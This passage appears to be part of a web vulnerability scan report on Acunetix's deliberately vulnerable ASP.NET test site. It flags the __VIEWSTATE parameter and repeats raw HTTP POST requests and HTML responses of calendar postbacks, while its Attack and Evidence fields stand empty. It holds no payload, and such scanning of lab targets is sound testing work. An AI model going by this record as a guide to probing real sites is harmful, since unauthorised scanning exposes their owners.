style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1173 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,173 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8168&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgBA%2BoVzNNoIZGRk6M%2BrdXfXASjJ2gCkGg%2BPfcVI%2F8U%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLg%2F9nYCAK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPhQZZWIUwidwYnIykNtRt6xXx%2B1E%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:32:59 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgBA+oVzNNoIZGRk6M+rdXfXASjJ2gCkGg+PfcVI/8U=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLg/9nYCAK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPhQZZWIUwidwYnIykNtRt6xXx+1E=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:White" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1163 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,163 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8156&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgBABYkFK9oIZGRkx6FBoApeK9SFC2uxGRyg8GALsDA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLM%2Br7KDAK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPlhzBrtuFJnTQAggQPpOgYtLg9g4%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:58:17 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgBABYkFK9oIZGRkx6FBoApeK9SFC2uxGRyg8GALsDA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLM+r7KDAK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPlhzBrtuFJnTQAggQPpOgYtLg9g4=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:White" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" 